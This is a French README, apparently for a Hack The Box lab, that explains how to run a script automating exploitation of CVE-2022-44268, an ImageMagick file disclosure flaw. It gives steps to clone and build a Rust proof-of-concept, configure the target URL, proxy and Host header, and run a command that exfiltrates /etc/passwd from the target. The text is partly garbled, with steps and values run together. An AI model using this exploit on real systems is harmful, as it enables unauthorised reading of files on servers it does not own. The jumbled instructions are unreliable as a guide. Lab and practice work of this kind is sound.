
Un script d'automatisation d'exploitation qui s'appuie sur le travail de Voidzone security.
Ce script automatise l'exploitation de CVE-2022-44268 (divulgation de fichiers ImageMagick).
image.png).exiftool pour extraire et afficher le contenu du fichier exfiltré.requests : pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.gitcargo build dans son répertoire.exiftool.wget.git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py) À L'INTÉRIEUR du répertoire CVE-2022-44268.Vous DEVEZ éditer le script Python (automate_exploit.py) pour votre cible. Variables clés à modifier :
payload : Chemin vers le image.png malveillant généré par le PoC Rust.
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png" (car le script s'exécute là où image.png est créé).url : L'URL cible pour le téléchargement d'image.
"http://pilgrimage.htb""http://vulnerable-site.com/upload").proxies (optionnel) : Pour router le trafic (par exemple via Burp Suite).
{'http': 'http://127.0.0.1:8080'}None si inutile.En-tête Host (dans le dictionnaire headers) : Doit correspondre au nom d'hôte dans votre url.
'Host': 'pilgrimage.htb'Assurez-vous d'être dans le répertoire CVE-2022-44268 (où se trouvent automate_exploit.py et le PoC Rust).
Exécutez le script en fournissant le chemin du fichier cible à exfiltrer comme argument :
python3 automate_exploit.py "/etc/passwd"